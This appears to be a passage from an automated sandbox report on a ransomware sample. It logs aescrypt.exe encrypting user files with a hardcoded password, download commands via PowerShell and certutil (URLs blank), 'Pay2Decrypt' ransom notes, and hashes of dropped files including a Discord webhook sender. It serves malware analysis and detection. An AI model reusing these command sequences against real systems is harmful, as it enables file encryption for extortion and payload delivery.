C:\Windows\system32\attrib.exeattrib +r "GetFind.png.lck"3⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WaitGet.wmf.lck" "WaitGet.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WaitGet.wmf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceComplete.svg.lck" "TraceComplete.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceComplete.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteApprove.jpeg.lck" "WriteApprove.jpeg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteApprove.jpeg.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Everywhere.search-ms.lck" "Everywhere.search-ms"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Everywhere.search-ms.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\InstallLock.xps.lck1⤵
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt3.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\p2d.bat" "1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap10835:64:7zEvent30677 -ad -saa -- "C:\Users\Admin\Desktop\p2d"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
2162be721b7178c7b599e9a3fd5a4460
SHA1a97f7c70e7e650df74edef8b629545994c5233da
SHA25684d6c7697f194bc748b16d0c02e5a785a52f513b36124b8b8a63d75d9c3692e7
SHA512da0ed6efb067cf7afba18c26e8b5cadbff9a8c337d4bb7a5db7a47780af82cce7e7d4df2cbaace1b79f5d52d13c22ea16927a412fd1515adf9bbe19acdb90e0d
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.batMD5
a3c193e950cda43a378e5765185f9c1c
SHA1e29c1d0ebe4c7c442a87677fa0263eef9c71922c
SHA256eaa894251d600481affb0ae4aea9669ccf8bb0cc16df20d3215d2b8b4be40c8a
SHA5125361701b35fa8a2e3b930d3ab4ce90cb2c687c75e398fcc82e688852ff629dd5cc222efb3c1899fd6712b6e4eb9eab1a745932742c50f7d3f6b35039c37cd62d
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exeMD5
38ce85e4580071c40bb204edfb85a303
SHA1eba80056f4a15fa131478532483b8abe050c6999
SHA256f0ffddcf4b507a617d6883889f5167cc6c2d27015ef63ad3e014db314cd8f465
SHA5120a310a94a418926524e16c15186ba89797b52cdf1ebcdd4f59b79c3963afdf07ea8ea8e58b23d5126590f3ff0bd2902a6f66d9b05e4b5b481331a97d0b6956fa
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exeMD5
fb7a78f485ec2586c54d60d293dd5352
SHA1d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb
SHA256b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9
SHA512b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exeMD5
82ff688aa9253b356e5d890ff311b59e
SHA14a143fc08b6a55866403966918026509befcc7c1
SHA256b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9
SHA512cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced
-